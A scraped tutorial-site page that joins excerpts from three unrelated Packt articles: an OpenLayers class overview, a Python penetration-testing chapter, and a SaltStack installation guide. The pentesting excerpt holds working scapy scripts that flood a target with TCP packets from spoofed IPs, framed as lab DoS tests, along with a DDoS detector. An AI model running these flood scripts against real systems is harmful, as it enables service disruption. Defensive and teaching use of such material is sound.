accomplish its job of putting an interactive map onto a web page. At the beginning of this article, we talked about both relationships and inheritance. So far, we've only covered the relationships. In the next section, we'll show the inheritance architecture of the key components and introduce three classes that have been working behind the scenes to make everything work. OpenLayers' super classes In this section, we will look at three classes in the OpenLayers library that we won't often work directly with, but which provide an enormous amount of functionality to most of the other classes in the library. The first two classes, Observable and Object, are at the base of the inheritance tree for OpenLayers—the so-called super classes that most classes inherit from. The third class, Collection, isn't actually a super class but is used as the basis for many relationships between classes in OpenLayers—we've already seen that the Map class relationships with layers, overlays, interactions, and controls are managed by instances of the Collection class. Before we jump into the details, take a look at the inheritance diagram for the components we've already discussed: As you can see, the Observable class, ol.Observable, is the base class for every component of OpenLayers that we've seen so far. In fact, there are very few classes in the OpenLayers library that do not inherit from the Observable class or one of its subclasses. Similarly, the Object class, ol.Object, is the base class for many classes in the library and itself is a subclass of Observable. The Observable and Object classes aren't very glamorous. You can't see them in action and they don't do anything very exciting from a user's perspective. What they do though is provide two common sets of behavior that you can expect to be able to use on almost every object you create or access through the OpenLayers library—Event management and Key-Value Observing (KVO). Event management with the Observable class An event is basically what it sounds like—something happening. Events are a fundamental part of how various components of OpenLayers—the map, layers, controls, and pretty much everything else—communicate with each other. It is often important to know when something has happened and to react to it. One type of event that is very useful is a user-generated event, such as a mouse click or touches on a mobile device's screen. Knowing when the user has clicked and dragged on the Map class allows some code to react to this and move the map to simulate panning it. Other types of events are internal, such as the map being moved or data finishing loading. To continue the previous example, once the map has moved to simulate panning, another event is issued by OpenLayers to say that the map has finished moving so that other parts of OpenLayers can react by updating the user interface with the center coordinates or by loading more data. Key-Value Observing with the Object class OpenLayers' Object class inherits from Observable and implements a software pattern called Key-Value Observing (KVO). With KVO, an object representing some data maintains a list of other objects that wish to observe it. When the data value changes, the observers are notified automatically. Working with Collections The last section for this article is about the OpenLayers' Collection class, ol.Collection. As mentioned, the Collection class is not a super class like Observable and Object, but it is an integral part of the relationship model. Many classes in OpenLayers make use of the Collection class to manage one-to-many relationships. At its core, the Collection class is a JavaScript array with additional convenience methods. It also inherits directly from the Object class and inherits the functionality of both Observable and Object. This makes the Collection class extremely powerful. Collection properties A Collection class, inherited from the Object class, has one observable property, length. When a collection changes (elements are added or removed), it's length property is updated. This means it also emits an event, change:length, when the length property is changed. Collection events A Collection class also inherits the functionality of the Observable class (via Object class) and emits two other events—add and remove. Registered event handler functions of both events will receive a single argument, a CollectionEvent, that has an element property with the element that was added or removed. Summary This wraps up our overview of the key concepts in the OpenLayers library. We took a quick look at the key components of the library from two different aspects—relationships and inheritance. With the Map class as the central object of any OpenLayers application, we looked at its main relationships to other classes including views, layers, overlays, interactions, and controls. We briefly introduced each of these classes to give an overview of primary purpose. We then investigated inheritance related to these objects and reviewed the super classes that provide functionality to most classes in the OpenLayers library—the Observable and Object classes. The Observable class provides a basic event mechanism and the Object class adds observable properties with a powerful binding feature. Lastly, we looked at the Collection class. Although this isn't part of the inheritance structure, it is crucial to know how one-to-many relationships work throughout the library (including the Map class relationships with layers, overlays, interactions, and controls). Resources for Article: Further resources on this subject: OGC for ESRI Professionals [Article] Improving proximity filtering with KNN [Article] OpenLayers: Overview of Vector Layer [Article]

0
0
3611

Packt

04 Feb 2015

22 min read

Pentesting Using Python

Packt

04 Feb 2015

22 min read

In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology. (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking on Python. Implementing a network sniffer by using Python Before learning about the implementation of a network sniffer, let's learn about a particular struct method: struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format struct.unpack(fmt, string): This method unpacks the string according to the given format Let's discuss the code: import struct ms= struct.pack('hhl', 1, 2, 3) print (ms) k= struct.unpack('hhl',ms) print k The output for the preceding code is as follows: G:PythonNetworkingnetwork>python str1.py ☺ ☻ ♥ (1, 2, 3) First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections. Consider the situation of the client server model; let's illustrate it by means of an example. Run the struct1.py. file. The server-side code is as follows: import socket import struct host = "192.168.0.1" port = 12347 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() print "connected by", addr msz= struct.pack('hhl', 1, 2, 3) conn.send(msz) conn.close() The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message. Run the unstruc.py file. The client-side code is as follows: import socket import struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = "192.168.0.1" port =12347 s.connect((host,port)) msg= s.recv(1024) print msg print struct.unpack('hhl',msg) s.close() The client-side code accepts the message and unpacks it in the given format. The output for the client-side code is as follows: C:network>python unstruc.py ☺ ☻ ♥ (1, 2, 3) The output for the server-side code is as follows: G:PythonNetworkingprogram>python struct1.py connected by ('192.168.0.11', 1417) Now, you must have a fair idea of how to pack and unpack the data. Format characters We have seen the format in the pack and unpack methods. In the following table, we have C Type and Python type columns. It denotes the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes. Format C Type Python type Standard size x pad byte no value c char string of length 1 1 b signed char integer 1 B unsigned char integer 1 ? _Bool bool 1 h short integer 2 H unsigned short integer 2 i int integer 4 I unsigned int integer 4 l long integer 4 L unsigned long integer 4 q long long integer 8 Q unsigned long long integer 8 f float float 4 d double float 8 s char[] string p char[] string P void * integer Let's check what will happen when one value is packed in different formats: >>> import struct >>> struct.pack('b',2) 'x02' >>> struct.pack('B',2) 'x02' >>> struct.pack('h',2) 'x02x00' We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes. Now, let's use the long int, which is 8 bytes: >>> struct.pack('q',2) 'x02x00x00x00x00x00x00x00' If we work on a network, ! should be used in the following format. The ! is used to avoid the confusion of whether network bytes are little-endian or big-endian. For more information on big-endian and little endian, you can refer to the Wikipedia page on Endianness: >>> struct.pack('!q',2) 'x00x00x00x00x00x00x00x02' >>> You can see the difference when using ! in the format. Before proceeding to sniffing, you should be aware of the following definitions: PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets. To run this, you must be logged in as a root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET. Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application. The following socket methods are used for byte-order conversion: socket.ntohl(x): This is the network to host long. It converts a 32-bit positive integer from the network to host the byte order. socket.ntohs(x): This is the network to host short. It converts a 16-bit positive integer from the network to host the byte order. socket.htonl(x): This is the host to network long. It converts a 32-bit positive integer from the host to the network byte order. socket.htons(x): This is the host to network short. It converts a 16-bit positive integer from the host to the network byte order. So, what is the significance of the preceding four methods? Consider a 16-bit number 0000000000000011. When you send this number from one computer to another computer, its order might get changed. The receiving computer might receive it in another form, such as 1100000000000000. These methods convert from your native byte order to the network byte order and back again. Now, let's look at the code to implement a network sniffer, which will work on three layers of the TCP/IP, that is, the physical layer (Ethernet), the Network layer (IP), and the TCP layer (port). Introducing DoS and DDoS In this section, we are going to discuss one of the most deadly attacks, called the Denial-of-Service attack. The aim of this attack is to consume machine or network resources, making it unavailable for the intended users. Generally, attackers use this attack when every other attack fails. This attack can be done at the data link, network, or application layer. Usually, a web server is the target for hackers. In a DoS attack, the attacker sends a huge number of requests to the web server, aiming to consume network bandwidth and machine memory. In a Distributed Denial-of-Service (DDoS) attack, the attacker sends a huge number of requests from different IPs. In order to carry out DDoS, the attacker can use Trojans or IP spoofing. In this section, we will carry out various experiments to complete our reports. Single IP single port In this attack, we send a huge number of packets to the web server using a single IP (which might be spoofed) and from a single source port number. This is a very low-level DoS attack, and this will test the web server's request-handling capacity. The following is the code of sisp.py: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") srcport = int(raw_input("Enter the Source Port ")) i=1 while True: IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .001) print "packet sent ", i i=i+1 I have used scapy to write this code, and I hope that you are familiar with this. The preceding code asks for three things, the source IP address, the destination IP address, and the source port address. Let's check the output on the attacker's machine: Single IP with single port I have used a spoofed IP in order to hide my identity. You will have to send a huge number of packets to check the behavior of the web server. During the attack, try to open a website hosted on a web server. Irrespective of whether it works or not, write your findings in the reports. Let's check the output on the server side: Wireshark output on the server This output shows that our packet was successfully sent to the server. Repeat this program with different sequence numbers. Single IP multiple port Now, in this attack, we use a single IP address but multiple ports. Here, I have written the code of the simp.py program: from scapy.all import * src = raw_input("Enter the Source IP ") target = raw_input("Enter the Target IP ") i=1 while True: for srcport in range(1,65535): IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .0001) print "packet sent ", i i=i+1 I used the for loop for the ports Let's check the output of the attacker: Packets from the attacker's machine The preceding screenshot shows that the packet was sent successfully. Now, check the output on the target machine: Packets appearing in the target machine In the preceding screenshot, the rectangular box shows the port numbers. I will leave it to you to create multiple IP with a single port. Multiple IP multiple port In this section, we will discuss the multiple IP with multiple port addresses. In this attack, we use different IPs to send the packet to the target. Multiple IPs denote spoofed IPs. The following program will send a huge number of packets from spoofed IPs: import random from scapy.all import * target = raw_input("Enter the Target IP ") i=1 while True: a = str(random.randint(1,254)) b = str(random.randint(1,254)) c = str(random.randint(1,254)) d = str(random.randint(1,254)) dot = "." src = a+dot+b+dot+c+dot+d print src st = random.randint(1,1000) en = random.randint(1000,65535) loop_break = 0 for srcport in range(st,en): IP1 = IP(src=src, dst=target) TCP1 = TCP(sport=srcport, dport=80) pkt = IP1 / TCP1 send(pkt,inter= .0001) print "packet sent ", i loop_break = loop_break+1 i=i+1 if loop_break ==50 : break In the preceding code, we used the a, b, c, and d variables to store four random strings, ranging from 1 to 254. The src variable stores random IP addresses. Here, we have used the loop_break variable to break the for loop after 50 packets. It means 50 packets originate from one IP while the rest of the code is the same as the previous one. Let's check the output of the mimp.py program: Multiple IP with multiple ports In the preceding screenshot, you can see that after packet 50, the IP addresses get changed. Let's check the output on the target machine: The target machine's output on Wireshark Use several machines and execute this code. In the preceding screenshot, you can see that the machine replies to the source IP. This type of attack is very difficult to detect because it is very hard to distinguish whether the packets are coming from a valid host or a spoofed host. Detection of DDoS When I was pursuing my Masters of Engineering degree, my friend and I were working on a DDoS attack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. In a DoS attack, traffic comes from only one source so we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let's go through a very simple code to detect a DDoS attack. The program's name is DDOS_detect1.py: import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str(datetime.now()) file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True: pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP): dict[IP]=dict[IP]+1 print dict[IP] if(dict[IP]>D_val) and (dict[IP]<D_val1) : line = "DDOS Detected " file_txt.writelines(line) file_txt.writelines(IP) file_txt.writelines("n") else: dict[IP]=1 In the previous code, we used a sniffer to get the packet's source IP address. The file_txt = open("dos.txt",'a') statement opens a file in append mode, and this dos.txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school's IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP. The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet's count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker's machine. The following screenshot shows the dos.txt file. Look at that file. It writes a single IP 9 times as we have mentioned D_val1 = D_val+10. You can change the D_val value to set the number of requests made by a particular IP. These depend on the old statistics of the website. I hope the preceding code will be useful for research purposes. Detecting a DDoS attack If you are a security researcher, the preceding program should be useful to you. You can modify the code such that only the packet that contains port 80 will be allowed. Summary In this article, we learned about penetration testing using Python. Also, we have learned about sniffing using Pyython script and client-side validation as well as how to bypass client-side validation. We also learned in which situations client-side validation is a good choice. We have gone through how to use Python to fill a form and send the parameter where the GET method has been used. As a penetration tester, you should know how parameter tampering affects a business. Four types of DoS attacks have been presented in this article. A single IP attack falls into the category of a DoS attack, and a Multiple IP attack falls into the category of a DDoS attack. This section is helpful not only for a pentester but also for researchers. Taking advantage of Python DDoS-detection scripts, you can modify the code and create larger code, which can trigger actions to control or mitigate the DDoS attack on the server. Resources for Article: Further resources on this subject: Veil-Evasion [article] Using the client as a pivot point [article] Penetration Testing and Setup [article]

0
0
41066

How-To Tutorials

article-image-calling-your-fellow-agents

Packt

04 Feb 2015

12 min read

Calling your fellow agents

Packt

04 Feb 2015

12 min read

0
0
8854

How-To Tutorials

Packt

04 Feb 2015

11 min read

Introducing Salt

Packt

04 Feb 2015

11 min read

In this article by Colton Myers, author of the book Learning SaltStack, we will learn the basic architecture of a Salt deployment. The two main pieces of Salt are the Salt Master and the Salt Minion. The master is the central hub. All minions connect to the master to receive instructions. From the master, you can run commands and apply configuration across hundreds or thousands of minions in seconds. The minion, as mentioned before, connects to the master and treats the master as the source of all truth. Although minions can exist without a master, the full power of Salt is realized when you have minions and the master working together. Salt is built on two major concepts: remote execution and configuration management. In the remote execution system, Salt leverages Python to accomplish complex tasks with single-function calls. The configuration management system in Salt, called States, builds upon the remote execution foundation to create repeatable, enforceable configuration for the minions. With this bird's-eye view in mind, let's get Salt installed so that we can start learning how to use it to make managing our infrastructure easier! (For more resources related to this topic, see here.) Installing Salt The dependencies for running Salt at the time of writing are as follows: Python 2—Version 2.6 or greater (not Python 3-compatible) msgpack-python YAML Jinja2 MarkupSafe Apache Libcloud Requests ZeroMQ—Version 3.2.0 or greater PyZMQ—Version 2.2.0 or greater PyCrypto M2Crypto The easiest way to ensure that the dependencies for Salt are met is to use system-specific package management systems, such as apt on Ubuntu systems, that will handle the dependency-resolution automatically. You can also use a script called Salt-Bootstrap to handle all of the system-specific commands for you. Salt-Bootstrap is an open source project with the goal of creating a Bourne shell-compatible script that will install Salt on any compatible server. The project is managed and hosted by the SaltStack team. You can find more information at https://github.com/saltstack/salt-bootstrap. We will explore each of these methods of installation in turn. Installation with system packages (Ubuntu) The latest release of Salt for Ubuntu is provided in Personal Package Archive (PPA), which is a type of package repository for Ubuntu. The easiest way to access the PPA to install Salt is using the add-apt-repository command, as follows: # sudo add-apt-repository ppa:saltstack/salt If the add-apt-repository command is not found, you can add it by installing the python-software-properties package: sudo apt-get install python-software-properties If you are using Ubuntu Version 12.10 or greater, this step should not be required as the add-apt-repository command should be included in the base system. After you have added the repository, you must update the package management database, as follows: # sudo apt-get update If the system asks whether you should accept a gpg key, press Enter to accept. You should then be able to install the Salt master and the Salt minion with the following command: # sudo apt-get install salt-master salt-minion Assuming there are no errors after running this command, you should be done! Salt is now installed on your machine. Note that we installed both the Salt master and the Salt minion. The term master refers to the central server—the server from which we will be controlling all of our other servers. The term minion refers to the servers connected to and controlled by a master. Installing with Salt-Bootstrap Information about manual installation on other major Linux distributions can be found online, at http://docs.saltstack.com. However, in most cases, it is easier and more straightforward to use a tool called Salt-Bootstrap. In-depth documentation can be found on the project page at https://github.com/saltstack/salt-bootstrap—however, the tool is actually quite easy to use, as follows: # curl -L https://bootstrap.saltstack.com -o install_salt.sh # sudo sh install_salt.sh –h We won't include the help text for Bootstrap here as it would take up too much space. However, it should be noted that, by default, Bootstrap will install only the Salt minion. We want both the Salt minion and the Salt master, which can be accomplished by passing in the -M flag, as follows: # sudo sh install_salt.sh -M The preceding command will result in a fully-functional installation of Salt on your machine! The supported operating system list is extensive, as follows: Amazon Linux AMI 2012.09 Arch Linux CentOS 5/6 Debian 6.x/7.x/8 (git installations only) Fedora 17/18 FreeBSD 9.1/9.2/10 Gentoo Linux Linaro Linux Mint 13/14 OpenSUSE 12.x Oracle Linux 5/6 RHEL 5/6 Scientific Linux 5/6 SmartOS SuSE 11 SP1 and 11 SP2 Ubuntu 10.x/11.x/12.x/13.x/14.x The version of Salt used for the examples in this book is the 2014.7 release. Here is the full version information: # sudo salt --versions-report Salt: 2014.7.0 Python: 2.7.6 Jinja2: 2.7.2 M2Crypto: 0.21.1 msgpack-python: 0.3.0 msgpack-pure: Not Installed pycrypto: 2.6.1 libnacl: Not Installed PyYAML: 3.10 ioflo: Not Installed PyZMQ: 14.0.1 RAET: Not Installed ZMQ: 4.0.4 Mako: 0.9.1 It's probable that the version of Salt you installed is a newer release and might have slightly different output. However, the examples should still all work in the latest version of Salt. Configuring Salt Now that we have the master and the minion installed on our machine, we must do a couple of pieces of configuration in order to allow them to talk to each other. Firewall configuration Since Salt minions connect to masters, the only firewall configuration that must be done is on the master. By default, ports 4505 and 4506 must be able to accept incoming connections on the master. The default install of Ubuntu 14.04, used for these examples, actually requires no firewall configuration out-of-the-box to be able to run Salt; the ports required are already open. However, many distributions of Linux come with much more restrictive default firewall settings. The most common firewall software in use by default is iptables. Note that you might also have to change firewall settings on your network hardware if there is network filtering in place outside the software on the machine on which you're working. Firewall configuration is a topic that deserves its own book. However, our needs for the configuration of Salt are fairly simple. First, you must find the set of rules currently in effect for your system. This varies from system to system; for example, the file is located in /etc/sysconfig/iptables on RedHat distributions, while it is located in /etc/iptables/iptables.rules in Arch Linux. Once you find that file, add the following lines to that file, but be sure to do it above the line that says DROP: -A INPUT -m state --state new -m tcp -p tcp --dport 4505 -j ACCEPT -A INPUT -m state --state new -m tcp -p tcp --dport 4506 -j ACCEPT For more information about configuring on your operating system of choice so that your Salt minion can connect successfully to your Salt master, see the Salt documentation at http://docs.saltstack.com/en/latest/topics/tutorials/firewall.html. In version 2014.7.0, a new experimental transport option was introduced in Salt, called RAET. The use of this transport system is beyond the scope of this book. This book will deal exclusively with the default, ZeroMQ-based transport in Salt. Salt minion configuration Out of the box, the Salt minion is configured to connect to a master at the location salt. The reason for this default is that, if DNS is configured correctly such that salt resolves to the master's IP address, no further configuration is needed. The minion will connect successfully to the master. However, in our example, we do not have any DNS configuration in place, so we must configure this ourselves. The minion and master configuration files are located in the /etc/salt/ directory. The /etc/salt/ directory should be created as part of the installation of Salt, assuming you followed the preceding directions. If it does not exist for some reason, please create the directory, and create two files, minion and master, within the directory. Open /etc/salt/minion with your text editor of choice (remember to use sudo!). We will be making a couple of changes to this file. First, find the commented-out line for the configuration option master. It should look like this: #master: salt Uncomment that line and change salt to localhost (as we have this minion connected to the local master). It should look like this: master: localhost If you cannot find the appropriate line in the file, just add the line shown previously to the top of the file. You should also manually configure the minion ID so that you can more easily follow along with the examples in this text. Find the ID line: #id: Uncomment it and set it to myminion: id: myminion Again, if you cannot find the appropriate line in the file, just add the line shown previously to the top of the file. Save and close the file. Without a manually-specified minion ID, the minion will try to intelligently guess what its minion ID should be at startup. For most systems, this will mean the minion ID will be set to the Fully-Qualified Domain Name (FQDN) for the system. Starting the Salt master and Salt minion Now we need to start (or restart) our Salt master and Salt minion. Assuming you're following along on Ubuntu (which I recommend), you can use the following commands: # sudo service salt-minion restart # sudo service salt-master restart Packages in other supported distributions ship with init scripts for Salt. Use whichever service system is available to you to start or restart the Salt minion and Salt master. Accepting the minion key on the master There is one last step remaining before we can run our first Salt commands. We must tell the master that it can trust the minion. To help us with this, Salt comes with the salt-key command to help us manage minion keys: # sudo salt-key Accepted Keys: Unaccepted Keys: myminion Rejected Keys: Notice that our minion, myminion, is listed in the Unaccepted Keys section. This means that the minion has contacted the master and the master has cached that minion's public key, and is waiting for further instructions as to whether to accept the minion or not. If your minion is not showing up in the output of salt-key, it's possible that the minion cannot reach the master on ports 4505 and 4506. Please refer to the Firewall section described previously for more information. Troubleshooting information can also be found in the Salt documentation at http://docs.saltstack.com/en/latest/topics/troubleshooting/. We can inspect the key's fingerprint to ensure that it matches our minion's key, as follows: # sudo salt-key -f myminion Unaccepted Keys: myminion: a8:1f:b0:c2:ab:9d:27:13:60:c9:81:b1:11:a3:68:e1 We can use the salt-call command to run a command on the minion to obtain the minion's key, as follows: # sudo salt-call --local key.finger local: a8:1f:b0:c2:ab:9d:27:13:60:c9:81:b1:11:a3:68:e1 Since the fingerprints match, we can accept the key on the master, as follows: # sudo salt-key -a myminion The following keys are going to be accepted: Unaccepted Keys: myminion Proceed? [n/Y] Y Key for minion myminion accepted. We can check that the minion key was accepted, as follows: # sudo salt-key Accepted Keys: myminion Unaccepted Keys: Rejected Keys: Success! We are ready to run our first Salt command! Summary We've covered a lot of ground in this article. We've installed the Salt minion and Salt master on our machines and configured them to talk to each other, including accepting the minion's key on the master. Resources for Article: Further resources on this subject: An Introduction to the Terminal [Article] Importing Dynamic Data [Article] Veil-Evasion [Article]

0
0
1963

Building the next generation Web with Meteor

Introduction to Apache ZooKeeper

Selecting the Layout

Google App Engine

Advanced Programming and Control

The Chain of Responsibility Pattern

Run Xcode Run

Transformations Using Map/Reduce

3D Modeling

What is Kali Linux

Trending Topics

Working with Incanter Datasets

OpenLayers' Key Components

Pentesting Using Python

Calling your fellow agents

Introducing Salt

Create a Free Account To Continue Reading

Sign in to activate your 7-day free access